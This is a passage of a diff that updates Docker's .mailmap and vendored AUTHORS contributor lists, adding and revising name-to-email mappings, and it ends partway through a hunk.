+Hyzhou Zhy <hyzhou.zhy@alibaba-inc.com> <1187766782@qq.com>
+Ilya Khlopotov <ilya.khlopotov@gmail.com>
+Ivan Markin <sw@nogoegst.net> <twim@riseup.net>
+Jack Laxson <jackjrabbit@gmail.com>
+Jacob Atzen <jacob@jacobatzen.dk> <jatzen@gmail.com>
+Jacob Tomlinson <jacob@tom.linson.uk> <jacobtomlinson@users.noreply.github.com>
+Jaivish Kothari <janonymous.codevulture@gmail.com>
+Jamie Hannaford <jamie@limetree.org> <jamie.hannaford@rackspace.com>
+Jean-Baptiste Barth <jeanbaptiste.barth@gmail.com>
+Jean-Baptiste Dalido <jeanbaptiste@appgratis.com>
+Jean-Tiare Le Bigot <jt@yadutaf.fr> <admin@jtlebi.fr>
+Jeff Anderson <jeff@docker.com> <jefferya@programmerq.net>
+Jeff Nickoloff <jeff.nickoloff@gmail.com> <jeff@allingeek.com>
+Jeroen Franse <jeroenfranse@gmail.com>
+Jessica Frazelle <jessfraz@google.com>
+Jessica Frazelle <jessfraz@google.com> <acidburn@docker.com>
+Jessica Frazelle <jessfraz@google.com> <acidburn@google.com>
+Jessica Frazelle <jessfraz@google.com> <jess@docker.com>
+Jessica Frazelle <jessfraz@google.com> <jess@mesosphere.com>
+Jessica Frazelle <jessfraz@google.com> <jfrazelle@users.noreply.github.com>
+Jessica Frazelle <jessfraz@google.com> <me@jessfraz.com>
+Jessica Frazelle <jessfraz@google.com> <princess@docker.com>
+Jim Galasyn <jim.galasyn@docker.com>
+Jiuyue Ma <majiuyue@huawei.com>
+Joey Geiger <jgeiger@gmail.com>
+Joffrey F <joffrey@docker.com>
+Joffrey F <joffrey@docker.com> <f.joffrey@gmail.com>
+Joffrey F <joffrey@docker.com> <joffrey@dotcloud.com>
+Johan Euphrosine <proppy@google.com> <proppy@aminche.com>
+John Harris <john@johnharris.io>
+John Howard (VM) <John.Howard@microsoft.com>
+John Howard (VM) <John.Howard@microsoft.com> <jhoward@microsoft.com>
+John Howard (VM) <John.Howard@microsoft.com> <jhoward@ntdev.microsoft.com>
+John Howard (VM) <John.Howard@microsoft.com> <jhowardmsft@users.noreply.github.com>
+John Howard (VM) <John.Howard@microsoft.com> <john.howard@microsoft.com>
+John Stephens <johnstep@docker.com> <johnstep@users.noreply.github.com>
+Jonathan Choy <jonathan.j.choy@gmail.com>
+Jonathan Choy <jonathan.j.choy@gmail.com> <oni@tetsujinlabs.com>
+Jon Surrell <jon.surrell@gmail.com> <jon.surrell@automattic.com>
+Jordan Arentsen <blissdev@gmail.com>
+Jordan Jennings <jjn2009@gmail.com> <jjn2009@users.noreply.github.com>
+Jorit Kleine-Möllhoff <joppich@bricknet.de> <joppich@users.noreply.github.com>
+Jose Diaz-Gonzalez <jose@seatgeek.com> <josegonzalez@users.noreply.github.com>
+Josh Bonczkowski <josh.bonczkowski@gmail.com>
+Josh Eveleth <joshe@opendns.com> <jeveleth@users.noreply.github.com>
 Josh Hawn <josh.hawn@docker.com> <jlhawn@berkeley.edu>
+Josh Horwitz <horwitz@addthis.com> <horwitzja@gmail.com>
+Josh Soref <jsoref@gmail.com> <jsoref@users.noreply.github.com>
+Josh Wilson <josh.wilson@fivestars.com> <jcwilson@users.noreply.github.com>
+Joyce Jang <mail@joycejang.com>
+Julien Bordellier <julienbordellier@gmail.com> <git@julienbordellier.com>
+Julien Bordellier <julienbordellier@gmail.com> <me@julienbordellier.com>
 Justin Cormack <justin.cormack@docker.com>
-<justin.cormack@docker.com> <justin.cormack@unikernel.com>
-<justin.cormack@docker.com> <justin@specialbusservice.com>
+Justin Cormack <justin.cormack@docker.com> <justin.cormack@unikernel.com>
+Justin Cormack <justin.cormack@docker.com> <justin@specialbusservice.com>
+Justin Simonelis <justin.p.simonelis@gmail.com> <justin.simonelis@PTS-JSIMON2.toronto.exclamation.com>
+Jérôme Petazzoni <jerome.petazzoni@docker.com> <jerome.petazzoni@dotcloud.com>
+Jérôme Petazzoni <jerome.petazzoni@docker.com> <jerome.petazzoni@gmail.com>
+Jérôme Petazzoni <jerome.petazzoni@docker.com> <jp@enix.org>
+K. Heller <pestophagous@gmail.com> <pestophagous@users.noreply.github.com>
+Kai Qiang Wu (Kennan) <wkq5325@gmail.com>
+Kai Qiang Wu (Kennan) <wkq5325@gmail.com> <wkqwu@cn.ibm.com>
 Kamil Domański <kamil@domanski.co>
+Kamjar Gerami <kami.gerami@gmail.com>
+Ken Cochrane <kencochrane@gmail.com> <KenCochrane@gmail.com>
+Ken Herner <kherner@progress.com> <chosenken@gmail.com>
+Kenfe-Mickaël Laventure <mickael.laventure@gmail.com>
+Kevin Feyrer <kevin.feyrer@btinternet.com> <kevinfeyrer@users.noreply.github.com>
+Kevin Kern <kaiwentan@harmonycloud.cn>
+Kevin Meredith <kevin.m.meredith@gmail.com>
+Kir Kolyshkin <kolyshkin@gmail.com>
+Kir Kolyshkin <kolyshkin@gmail.com> <kir@openvz.org>
+Kir Kolyshkin <kolyshkin@gmail.com> <kolyshkin@users.noreply.github.com>
+Konrad Kleine <konrad.wilhelm.kleine@gmail.com> <kwk@users.noreply.github.com>
+Konstantin Gribov <grossws@gmail.com>
+Konstantin Pelykh <kpelykh@zettaset.com>
+Kotaro Yoshimatsu <kotaro.yoshimatsu@gmail.com>
+Kunal Kushwaha <kushwaha_kunal_v7@lab.ntt.co.jp> <kunal.kushwaha@gmail.com>
+Lajos Papp <lajos.papp@sequenceiq.com> <lalyos@yahoo.com>
 Lei Jitang <leijitang@huawei.com>
-<leijitang@huawei.com> <leijitang@gmail.com>
+Lei Jitang <leijitang@huawei.com> <leijitang@gmail.com>
+Liang Mingqiang <mqliang.zju@gmail.com>
+Liang-Chi Hsieh <viirya@gmail.com>
+Liao Qingwei <liaoqingwei@huawei.com>
 Linus Heckemann <lheckemann@twig-world.com>
-<lheckemann@twig-world.com> <anonymouse2048@gmail.com>
+Linus Heckemann <lheckemann@twig-world.com> <anonymouse2048@gmail.com>
+Lokesh Mandvekar <lsm5@fedoraproject.org> <lsm5@redhat.com>
+Lorenzo Fontana <lo@linux.com> <fontanalorenzo@me.com>
+Louis Opter <kalessin@kalessin.fr>
+Louis Opter <kalessin@kalessin.fr> <louis@dotcloud.com>
+Luca Favatella <luca.favatella@erlang-solutions.com> <lucafavatella@users.noreply.github.com>
+Luke Marsden <me@lukemarsden.net> <luke@digital-crocus.com>
+Lyn <energylyn@zju.edu.cn>
 Lynda O'Leary <lyndaoleary29@gmail.com>
-<lyndaoleary29@gmail.com> <lyndaoleary@hotmail.com>
+Lynda O'Leary <lyndaoleary29@gmail.com> <lyndaoleary@hotmail.com>
+Ma Müller <mueller-ma@users.noreply.github.com>
+Madhan Raj Mookkandy <MadhanRaj.Mookkandy@microsoft.com> <madhanm@microsoft.com>
+Madhu Venugopal <madhu@socketplane.io> <madhu@docker.com>
+Mageee <fangpuyi@foxmail.com> <21521230.zju.edu.cn>
+Mansi Nahar <mmn4185@rit.edu> <mansi.nahar@macbookpro-mansinahar.local>
+Mansi Nahar <mmn4185@rit.edu> <mansinahar@users.noreply.github.com>
+Marc Abramowitz <marc@marc-abramowitz.com> <msabramo@gmail.com>
+Marcelo Horacio Fortino <info@fortinux.com> <fortinux@users.noreply.github.com>
+Marcus Linke <marcus.linke@gmx.de>
 Marianna Tessel <mtesselh@gmail.com>
+Mark Oates <fl0yd@me.com>
+Markan Patel <mpatel678@gmail.com>
+Markus Kortlang <hyp3rdino@googlemail.com> <markus.kortlang@lhsystems.com>
+Martin Redmond <redmond.martin@gmail.com> <martin@tinychat.com>
+Martin Redmond <redmond.martin@gmail.com> <xgithub@redmond5.com>
+Mary Anthony <mary.anthony@docker.com> <mary@docker.com>
+Mary Anthony <mary.anthony@docker.com> <moxieandmore@gmail.com>
+Mary Anthony <mary.anthony@docker.com> moxiegirl <mary@docker.com>
+Masato Ohba <over.rye@gmail.com>
+Matt Bentley <matt.bentley@docker.com> <mbentley@mbentley.net>
+Matt Schurenko <matt.schurenko@gmail.com>
+Matt Williams <mattyw@me.com>
+Matt Williams <mattyw@me.com> <gh@mattyw.net>
+Matthew Heon <mheon@redhat.com> <mheon@mheonlaptop.redhat.com>
+Matthew Mosesohn <raytrac3r@gmail.com>
+Matthew Mueller <mattmuelle@gmail.com>
+Matthias Kühnle <git.nivoc@neverbox.com> <kuehnle@online.de>
+Mauricio Garavaglia <mauricio@medallia.com> <mauriciogaravaglia@gmail.com>
+Michael Crosby <michael@docker.com> <crosby.michael@gmail.com>
+Michael Crosby <michael@docker.com> <crosbymichael@gmail.com>
+Michael Crosby <michael@docker.com> <michael@crosbymichael.com>
+Michał Gryko <github@odkurzacz.org>
+Michael Hudson-Doyle <michael.hudson@canonical.com> <michael.hudson@linaro.org>
 Michael Huettermann <michael@huettermann.net>
+Michael Käufl <docker@c.michael-kaeufl.de> <michael-k@users.noreply.github.com>
+Michael Nussbaum <michael.nussbaum@getbraintree.com>
+Michael Nussbaum <michael.nussbaum@getbraintree.com> <code@getbraintree.com>
+Michael Spetsiotis <michael_spets@hotmail.com>
+Michal Minář <miminar@redhat.com>
+Miguel Angel Alvarez Cabrerizo <doncicuto@gmail.com> <30386061+doncicuto@users.noreply.github.com>
+Miguel Angel Fernández <elmendalerenda@gmail.com>
+Mihai Borobocea <MihaiBorob@gmail.com> <MihaiBorobocea@gmail.com>
+Mike Casas <mkcsas0@gmail.com> <mikecasas@users.noreply.github.com>
+Mike Goelzer <mike.goelzer@docker.com> <mgoelzer@docker.com>
+Milind Chawre <milindchawre@gmail.com>
+Misty Stanley-Jones <misty@docker.com> <misty@apache.org>
+Mohit Soni <mosoni@ebay.com> <mohitsoni1989@gmail.com>
+Moorthy RS <rsmoorthy@gmail.com> <rsmoorthy@users.noreply.github.com>
 Moysés Borges <moysesb@gmail.com>
-<moysesb@gmail.com> <moyses.furtado@wplex.com.br>
+Moysés Borges <moysesb@gmail.com> <moyses.furtado@wplex.com.br>
+Nace Oroz <orkica@gmail.com>
+Nathan LeClaire <nathan.leclaire@docker.com> <nathan.leclaire@gmail.com>
+Nathan LeClaire <nathan.leclaire@docker.com> <nathanleclaire@gmail.com>
+Neil Horman <nhorman@tuxdriver.com> <nhorman@hmswarspite.think-freely.org>
+Nick Russo <nicholasjamesrusso@gmail.com> <nicholasrusso@icloud.com>
+Nicolas Borboën <ponsfrilus@gmail.com> <ponsfrilus@users.noreply.github.com>
 Nigel Poulton <nigelpoulton@hotmail.com>
+Nik Nyby <nikolas@gnu.org> <nnyby@columbia.edu>
+Nolan Darilek <nolan@thewordnerd.info>
+O.S. Tezer <ostezer@gmail.com>
+O.S. Tezer <ostezer@gmail.com> <ostezer@users.noreply.github.com>
+Oh Jinkyun <tintypemolly@gmail.com> <tintypemolly@Ohui-MacBook-Pro.local>
+Ouyang Liduo <oyld0210@163.com>
+Patrick Stapleton <github@gdi2290.com>
+Paul Liljenberg <liljenberg.paul@gmail.com> <letters@paulnotcom.se>
+Pavel Tikhomirov <ptikhomirov@virtuozzo.com> <ptikhomirov@parallels.com>
+Pawel Konczalski <mail@konczalski.de>
+Peter Choi <phkchoi89@gmail.com> <reikani@Peters-MacBook-Pro.local>
+Peter Dave Hello <hsu@peterdavehello.org> <PeterDaveHello@users.noreply.github.com>
+Peter Jaffe <pjaffe@nevo.com>
+Peter Nagy <xificurC@gmail.com> <pnagy@gratex.com>
+Peter Waller <p@pwaller.net> <peter@scraperwiki.com>
+Phil Estes <estesp@linux.vnet.ibm.com> <estesp@gmail.com>
+Philip Alexander Etling <paetling@gmail.com>
+Philipp Gillé <philipp.gille@gmail.com> <philippgille@users.noreply.github.com>
 Qiang Huang <h.huangqiang@huawei.com>
-<h.huangqiang@huawei.com> <qhuang@10.0.2.15>
-Boaz Shuster <ripcurld.github@gmail.com>
+Qiang Huang <h.huangqiang@huawei.com> <qhuang@10.0.2.15>
+Ray Tsang <rayt@google.com> <saturnism@users.noreply.github.com>
+Renaud Gaubert <rgaubert@nvidia.com> <renaud.gaubert@gmail.com>
+Robert Terhaar <rterhaar@atlanticdynamic.com> <robbyt@users.noreply.github.com>
+Roberto G. Hashioka <roberto.hashioka@docker.com> <roberto_hashioka@hotmail.com>
+Roberto Muñoz Fernández <robertomf@gmail.com> <roberto.munoz.fernandez.contractor@bbva.com>
+Roman Dudin <katrmr@gmail.com> <decadent@users.noreply.github.com>
+Ross Boucher <rboucher@gmail.com>
+Runshen Zhu <runshen.zhu@gmail.com>
+Ryan Stelly <ryan.stelly@live.com>
+Sakeven Jiang <jc5930@sina.cn>
+Sandeep Bansal <sabansal@microsoft.com>
+Sandeep Bansal <sabansal@microsoft.com> <msabansal@microsoft.com>
+Sargun Dhillon <sargun@netflix.com> <sargun@sargun.me>
+Sean Lee <seanlee@tw.ibm.com> <scaleoutsean@users.noreply.github.com>
+Sebastiaan van Stijn <github@gone.nl> <sebastiaan@ws-key-sebas3.dpi1.dpi>
+Sebastiaan van Stijn <github@gone.nl> <thaJeztah@users.noreply.github.com>
+Shaun Kaasten <shaunk@gmail.com>
+Shawn Landden <shawn@churchofgit.com> <shawnlandden@gmail.com>
+Shengbo Song <thomassong@tencent.com>
+Shengbo Song <thomassong@tencent.com> <mymneo@163.com>
+Shih-Yuan Lee <fourdollars@gmail.com>
+Shishir Mahajan <shishir.mahajan@redhat.com> <smahajan@redhat.com>
+Shukui Yang <yangshukui@huawei.com>
 Shuwei Hao <haosw@cn.ibm.com>
-<haosw@cn.ibm.com> <haoshuwei24@gmail.com>
+Shuwei Hao <haosw@cn.ibm.com> <haoshuwei24@gmail.com>
+Sidhartha Mani <sidharthamn@gmail.com>
+Sjoerd Langkemper <sjoerd-github@linuxonly.nl> <sjoerd@byte.nl>
+Solomon Hykes <solomon@docker.com> <s@docker.com>
+Solomon Hykes <solomon@docker.com> <solomon.hykes@dotcloud.com>
+Solomon Hykes <solomon@docker.com> <solomon@dotcloud.com>
 Soshi Katsuta <soshi.katsuta@gmail.com>
-<soshi.katsuta@gmail.com> <katsuta_soshi@cyberagent.co.jp>
+Soshi Katsuta <soshi.katsuta@gmail.com> <katsuta_soshi@cyberagent.co.jp>
+Sridhar Ratnakumar <sridharr@activestate.com>
+Sridhar Ratnakumar <sridharr@activestate.com> <github@srid.name>
+Srini Brahmaroutu <srbrahma@us.ibm.com> <sbrahma@us.ibm.com>
+Srinivasan Srivatsan <srinivasan.srivatsan@hpe.com> <srinsriv@users.noreply.github.com>
 Stefan Berger <stefanb@linux.vnet.ibm.com>
-<stefanb@linux.vnet.ibm.com> <stefanb@us.ibm.com>
+Stefan Berger <stefanb@linux.vnet.ibm.com> <stefanb@us.ibm.com>
+Stefan J. Wernli <swernli@microsoft.com> <swernli@ntdev.microsoft.com>
+Stefan S. <tronicum@user.github.com>
+Stephan Spindler <shutefan@gmail.com> <shutefan@users.noreply.github.com>
 Stephen Day <stephen.day@docker.com>
-<stephen.day@docker.com> <stevvooe@users.noreply.github.com>
+Stephen Day <stephen.day@docker.com> <stevvooe@users.noreply.github.com>
+Steve Desmond <steve@vtsv.ca> <stevedesmond-ca@users.noreply.github.com>
+Sun Gengze <690388648@qq.com>
+Sun Jianbo <wonderflow.sun@gmail.com>
+Sun Jianbo <wonderflow.sun@gmail.com> <wonderflow@zju.edu.cn>
+Sven Dowideit <SvenDowideit@home.org.au>
+Sven Dowideit <SvenDowideit@home.org.au> <sven@t440s.home.gateway>
+Sven Dowideit <SvenDowideit@home.org.au> <SvenDowideit@docker.com>
+Sven Dowideit <SvenDowideit@home.org.au> <SvenDowideit@fosiki.com>
+Sven Dowideit <SvenDowideit@home.org.au> <SvenDowideit@home.org.au>
+Sven Dowideit <SvenDowideit@home.org.au> <SvenDowideit@users.noreply.github.com>
+Sven Dowideit <SvenDowideit@home.org.au> <¨SvenDowideit@home.org.au¨>
+Sylvain Bellemare <sylvain@ascribe.io>
+Sylvain Bellemare <sylvain@ascribe.io> <sylvain.bellemare@ezeep.com>
+Tangi Colin <tangicolin@gmail.com>
+Tejesh Mehta <tejesh.mehta@gmail.com> <tj@init.me>
+Thatcher Peskens <thatcher@docker.com>
+Thatcher Peskens <thatcher@docker.com> <thatcher@dotcloud.com>
+Thatcher Peskens <thatcher@docker.com> <thatcher@gmx.net>
+Thomas Gazagnaire <thomas@gazagnaire.org> <thomas@gazagnaire.com>
+Thomas Léveil <thomasleveil@gmail.com>
+Thomas Léveil <thomasleveil@gmail.com> <thomasleveil@users.noreply.github.com>
+Tibor Vass <teabee89@gmail.com> <tibor@docker.com>
+Tibor Vass <teabee89@gmail.com> <tiborvass@users.noreply.github.com>
+Tim Bart <tim@fewagainstmany.com>
+Tim Bosse <taim@bosboot.org> <maztaim@users.noreply.github.com>
+Tim Ruffles <oi@truffles.me.uk> <timruffles@googlemail.com>
+Tim Terhorst <mynamewastaken+git@gmail.com>
+Tim Zju <21651152@zju.edu.cn>
+Timothy Hobbs <timothyhobbs@seznam.cz>
 Toli Kuznets <toli@docker.com>
+Tom Barlow <tomwbarlow@gmail.com>
+Tom Sweeney <tsweeney@redhat.com>
+Tõnis Tiigi <tonistiigi@gmail.com>
+Trishna Guha <trishnaguha17@gmail.com>
 Tristan Carel <tristan@cogniteev.com>
-<tristan@cogniteev.com> <tristan.carel@gmail.com>
-Vincent Demeester <vincent@sbr.pm>
-<vincent@sbr.pm> <vincent+github@demeester.fr>
+Tristan Carel <tristan@cogniteev.com> <tristan.carel@gmail.com>
+Umesh Yadav <umesh4257@gmail.com>
+Umesh Yadav <umesh4257@gmail.com> <dungeonmaster18@users.noreply.github.com>
+Victor Lyuboslavsky <victor@victoreda.com>
+Victor Vieux <victor.vieux@docker.com> <dev@vvieux.com>
+Victor Vieux <victor.vieux@docker.com> <victor.vieux@dotcloud.com>
+Victor Vieux <victor.vieux@docker.com> <victor@docker.com>
+Victor Vieux <victor.vieux@docker.com> <victor@dotcloud.com>
+Victor Vieux <victor.vieux@docker.com> <victorvieux@gmail.com>
+Victor Vieux <victor.vieux@docker.com> <vieux@docker.com>
+Viktor Vojnovski <viktor.vojnovski@amadeus.com> <vojnovski@gmail.com>
+Vincent Batts <vbatts@redhat.com> <vbatts@hashbangbash.com>
+Vincent Bernat <Vincent.Bernat@exoscale.ch> <bernat@luffy.cx>
+Vincent Bernat <Vincent.Bernat@exoscale.ch> <vincent@bernat.im>
+Vincent Demeester <vincent.demeester@docker.com> <vincent+github@demeester.fr>
+Vincent Demeester <vincent.demeester@docker.com> <vincent@demeester.fr>
+Vincent Demeester <vincent.demeester@docker.com> <vincent@sbr.pm>
 Vishnu Kannan <vishnuk@google.com>
-xlgao-zju <xlgao@zju.edu.cn> xlgao <xlgao@zju.edu.cn>
-yuchangchun <yuchangchun1@huawei.com> y00277921 <yuchangchun1@huawei.com> 
-<zij@case.edu> <zjaffee@us.ibm.com>
-<anujbahuguna.dev@gmail.com> <abahuguna@fiberlink.com>
-<eungjun.yi@navercorp.com> <semtlenori@gmail.com>
-<haosw@cn.ibm.com> <haoshuwei1989@163.com>
-Hao Shu Wei <haosw@cn.ibm.com>
-<matt.bentley@docker.com> <mbentley@mbentley.net>
-<MihaiBorob@gmail.com> <MihaiBorobocea@gmail.com>
-<redmond.martin@gmail.com> <xgithub@redmond5.com>
-<redmond.martin@gmail.com> <martin@tinychat.com>
-<srbrahma@us.ibm.com> <sbrahma@us.ibm.com>
-<suda.akihiro@lab.ntt.co.jp> <suda.kyoto@gmail.com>
-<thomas@gazagnaire.org> <thomas@gazagnaire.com>
-Shengbo Song <thomassong@tencent.com> mYmNeo <mymneo@163.com>
-Shengbo Song <thomassong@tencent.com>
-<sylvain@ascribe.io> <sylvain.bellemare@ezeep.com>
-Sylvain Bellemare <sylvain@ascribe.io>
-<alexandre.beslic@gmail.com> <abronan@docker.com>
-<bilal.amarni@gmail.com> <bamarni@users.noreply.github.com>
-<misty@docker.com> <misty@apache.org>
-Arnaud Porterie <arnaud.porterie@docker.com>
-<cpuguy83@gmail.com> <bgoff@cpuguy83-mbp.local>
-David M. Karr <davidmichaelkarr@gmail.com>
-<diogo@docker.com> <diogo.monica@gmail.com>
-<horwitz@addthis.com> <horwitzja@gmail.com>
-<kherner@progress.com> <chosenken@gmail.com>
-Kenfe-Mickaël Laventure <mickael.laventure@gmail.com>
-<mauricio@medallia.com> <mauriciogaravaglia@gmail.com>
-<dhenderson@gmail.com> <Dave.Henderson@ca.ibm.com>
-<wkq5325@gmail.com> <wkqwu@cn.ibm.com>
-<mike.goelzer@docker.com> <mgoelzer@docker.com>
-<nicholasjamesrusso@gmail.com> <nicholasrusso@icloud.com>
-Runshen Zhu <runshen.zhu@gmail.com>
-Tom Barlow <tomwbarlow@gmail.com>
+Vladimir Rutsky <altsysrq@gmail.com> <iamironbob@gmail.com>
+Walter Stanish <walter@pratyeka.org>
+Wang Chao <chao.wang@ucloud.cn>
+Wang Chao <chao.wang@ucloud.cn> <wcwxyz@gmail.com>
+Wang Guoliang <liangcszzu@163.com>
+Wang Jie <wangjie5@chinaskycloud.com>
+Wang Ping <present.wp@icloud.com>
+Wang Xing <hzwangxing@corp.netease.com> <root@localhost>
+Wang Yuexiao <wang.yuexiao@zte.com.cn>
+Wayne Chang <wayne@neverfear.org>
+Wayne Song <wsong@docker.com> <wsong@users.noreply.github.com>
+Wei Wu <wuwei4455@gmail.com> cizixs <cizixs@163.com>
+Wenjun Tang <tangwj2@lenovo.com> <dodia@163.com>
+Wewang Xiaorenfine <wang.xiaoren@zte.com.cn>
+Will Weaver <monkey@buildingbananas.com>
+Xianglin Gao <xlgao@zju.edu.cn>
 Xianlu Bird <xianlubird@gmail.com>
-Dan Feldman <danf@jfrog.com>
-Harry Zhang <harryz@hyper.sh> <harryzhang@zju.edu.cn>
+Xiaoyu Zhang <zhang.xiaoyu33@zte.com.cn>
+Xuecong Liao <satorulogic@gmail.com>
+Yamasaki Masahide <masahide.y@gmail.com>
+Yao Zaiyong <yaozaiyong@hotmail.com>
+Yassine Tijani <yasstij11@gmail.com>
+Yazhong Liu <yorkiefixer@gmail.com>
+Yestin Sun <sunyi0804@gmail.com> <yestin.sun@polyera.com>
+Yi EungJun <eungjun.yi@navercorp.com> <semtlenori@gmail.com>
+Ying Li <ying.li@docker.com>
+Ying Li <ying.li@docker.com> <cyli@twistedmatrix.com>
+Yong Tang <yong.tang.github@outlook.com> <yongtang@users.noreply.github.com>
+Yosef Fertel <yfertel@gmail.com> <frosforever@users.noreply.github.com>
+Yu Changchun <yuchangchun1@huawei.com>
+Yu Chengxia <yuchengxia@huawei.com>
+Yu Peng <yu.peng36@zte.com.cn>
+Yu Peng <yu.peng36@zte.com.cn> <yupeng36@zte.com.cn>
+Zachary Jaffee <zjaffee@us.ibm.com> <zij@case.edu>
+Zachary Jaffee <zjaffee@us.ibm.com> <zjaffee@apache.org>
+ZhangHang <stevezhang2014@gmail.com>
+Zhenkun Bi <bi.zhenkun@zte.com.cn>
+Zhou Hao <zhouhao@cn.fujitsu.com>
+Zhu Kunjia <zhu.kunjia@zte.com.cn>
+Zou Yu <zouyu7@huawei.com>
diff --git a/vendor/github.com/docker/docker/AUTHORS b/vendor/github.com/docker/docker/AUTHORS
index 246e2a33f5..46102d7402 100644
--- a/vendor/github.com/docker/docker/AUTHORS
+++ b/vendor/github.com/docker/docker/AUTHORS
@@ -5,21 +5,29 @@ Aanand Prasad <aanand.prasad@gmail.com>
 Aaron Davidson <aaron@databricks.com>
 Aaron Feng <aaron.feng@gmail.com>
 Aaron Huslage <huslage@gmail.com>
+Aaron L. Xu <liker.xu@foxmail.com>
 Aaron Lehmann <aaron.lehmann@docker.com>
 Aaron Welch <welch@packet.net>
+Aaron.L.Xu <likexu@harmonycloud.cn>
 Abel Muiño <amuino@gmail.com>
 Abhijeet Kasurde <akasurde@redhat.com>
+Abhinandan Prativadi <abhi@docker.com>
 Abhinav Ajgaonkar <abhinav316@gmail.com>
 Abhishek Chanda <abhishek.becs@gmail.com>
+Abhishek Sharma <abhishek@asharma.me>
 Abin Shahab <ashahab@altiscale.com>
 Adam Avilla <aavilla@yp.com>
+Adam Eijdenberg <adam.eijdenberg@gmail.com>
 Adam Kunk <adam.kunk@tiaa-cref.org>
 Adam Miller <admiller@redhat.com>
 Adam Mills <adam@armills.info>
+Adam Pointer <adam.pointer@skybettingandgaming.com>
 Adam Singer <financeCoding@gmail.com>
 Adam Walz <adam@adamwalz.net>
+Addam Hardy <addam.hardy@gmail.com>
 Aditi Rajagopal <arajagopal@us.ibm.com>
 Aditya <aditya@netroy.in>
+Adnan Khan <adnkha@amazon.com>
 Adolfo Ochagavía <aochagavia92@gmail.com>
 Adria Casas <adriacasas88@gmail.com>
 Adrian Moisey <adrian@changeover.za.net>
@@ -31,62 +39,81 @@ Ahmed Kamal <email.ahmedkamal@googlemail.com>
 Ahmet Alp Balkan <ahmetb@microsoft.com>
 Aidan Feldman <aidan.feldman@gmail.com>
 Aidan Hobson Sayers <aidanhs@cantab.net>
-AJ Bowen <aj@gandi.net>
+AJ Bowen <aj@soulshake.net>
 Ajey Charantimath <ajey.charantimath@gmail.com>
 ajneu <ajneu@users.noreply.github.com>
+Akash Gupta <akagup@microsoft.com>
+Akihiro Matsushima <amatsusbit@gmail.com>
 Akihiro Suda <suda.akihiro@lab.ntt.co.jp>
+Akim Demaille <akim.demaille@docker.com>
+Akira Koyasu <mail@akirakoyasu.net>
+Akshay Karle <akshay.a.karle@gmail.com>
 Al Tobey <al@ooyala.com>
 alambike <alambike@gmail.com>
 Alan Scherger <flyinprogrammer@gmail.com>
 Alan Thompson <cloojure@gmail.com>
 Albert Callarisa <shark234@gmail.com>
 Albert Zhang <zhgwenming@gmail.com>
+Alejandro González Hevia <alejandrgh11@gmail.com>
 Aleksa Sarai <asarai@suse.de>
 Aleksandrs Fadins <aleks@s-ko.net>
 Alena Prokharchyk <alena@rancher.com>
-Alessandro Boch <aboch@docker.com>
+Alessandro Boch <aboch@tetrationanalytics.com>
 Alessio Biancalana <dottorblaster@gmail.com>
 Alex Chan <alex@alexwlchan.net>
+Alex Chen <alexchenunix@gmail.com>
 Alex Coventry <alx@empirical.com>
 Alex Crawford <alex.crawford@coreos.com>
 Alex Ellis <alexellis2@gmail.com>
 Alex Gaynor <alex.gaynor@gmail.com>
+Alex Goodman <wagoodman@gmail.com>
 Alex Olshansky <i@creagenics.com>
 Alex Samorukov <samm@os2.kiev.ua>
 Alex Warhawk <ax.warhawk@gmail.com>
 Alexander Artemenko <svetlyak.40wt@gmail.com>
 Alexander Boyd <alex@opengroove.org>
 Alexander Larsson <alexl@redhat.com>
+Alexander Midlash <amidlash@docker.com>
 Alexander Morozov <lk4d4@docker.com>
 Alexander Shopov <ash@kambanaria.org>
 Alexandre Beslic <alexandre.beslic@gmail.com>
+Alexandre Garnier <zigarn@gmail.com>
 Alexandre González <agonzalezro@gmail.com>
+Alexandre Jomin <alexandrejomin@gmail.com>
 Alexandru Sfirlogea <alexandru.sfirlogea@gmail.com>
 Alexey Guskov <lexag@mail.ru>
 Alexey Kotlyarov <alexey@infoxchange.net.au>
 Alexey Shamrin <shamrin@gmail.com>
 Alexis THOMAS <fr.alexisthomas@gmail.com>
+Alfred Landrum <alfred.landrum@docker.com>
 Ali Dehghani <ali.dehghani.g@gmail.com>
+Alicia Lauerman <alicia@eta.im>
+Alihan Demir <alihan_6153@hotmail.com>
 Allen Madsen <blatyo@gmail.com>
-Allen Sun <allen.sun@daocloud.io>
+Allen Sun <allensun.shl@alibaba-inc.com>
 almoehi <almoehi@users.noreply.github.com>
 Alvaro Saurin <alvaro.saurin@gmail.com>
+Alvin Deng <alvin.q.deng@utexas.edu>
 Alvin Richards <alvin.richards@docker.com>
 amangoel <amangoel@gmail.com>
 Amen Belayneh <amenbelayneh@gmail.com>
+Amir Goldstein <amir73il@aquasec.com>
 Amit Bakshi <ambakshi@gmail.com>
 Amit Krishnan <amit.krishnan@oracle.com>
 Amit Shukla <amit.shukla@docker.com>
+Amr Gawish <amr.gawish@gmail.com>
 Amy Lindburg <amy.lindburg@docker.com>
 Anand Patil <anand.prabhakar.patil@gmail.com>
 AnandkumarPatel <anandkumarpatel@gmail.com>
 Anatoly Borodin <anatoly.borodin@gmail.com>
 Anchal Agrawal <aagrawa4@illinois.edu>
+Anda Xu <anda.xu@docker.com>
 Anders Janmyr <anders@janmyr.com>
 Andre Dublin <81dublin@gmail.com>
 Andre Granovsky <robotciti@live.com>
 Andrea Luzzardi <aluzzardi@gmail.com>
 Andrea Turli <andrea.turli@gmail.com>
+Andreas Elvers <andreas@work.de>
 Andreas Köhler <andi5.py@gmx.net>
 Andreas Savvides <andreas@editd.com>
 Andreas Tiefenthaler <at@an-ti.eu>
@@ -97,13 +124,17 @@ Andrew Duckworth <grillopress@gmail.com>
 Andrew France <andrew@avito.co.uk>
 Andrew Gerrand <adg@golang.org>
 Andrew Guenther <guenther.andrew.j@gmail.com>
+Andrew He <he.andrew.mail@gmail.com>
+Andrew Hsu <andrewhsu@docker.com>
 Andrew Kuklewicz <kookster@gmail.com>
 Andrew Macgregor <andrew.macgregor@agworld.com.au>
 Andrew Macpherson <hopscotch23@gmail.com>
 Andrew Martin <sublimino@gmail.com>
+Andrew McDonnell <bugs@andrewmcdonnell.net>
 Andrew Munsell <andrew@wizardapps.net>
+Andrew Pennebaker <andrew.pennebaker@gmail.com>
 Andrew Po <absourd.noise@gmail.com>
-Andrew Weiss <andrew.weiss@outlook.com>
+Andrew Weiss <andrew.weiss@docker.com>
 Andrew Williams <williams.andrew@gmail.com>
 Andrews Medina <andrewsmedina@gmail.com>
 Andrey Petrov <andrey.petrov@shazow.net>
@@ -122,10 +153,13 @@ Anil Belur <askb23@gmail.com>
 Anil Madhavapeddy <anil@recoil.org>
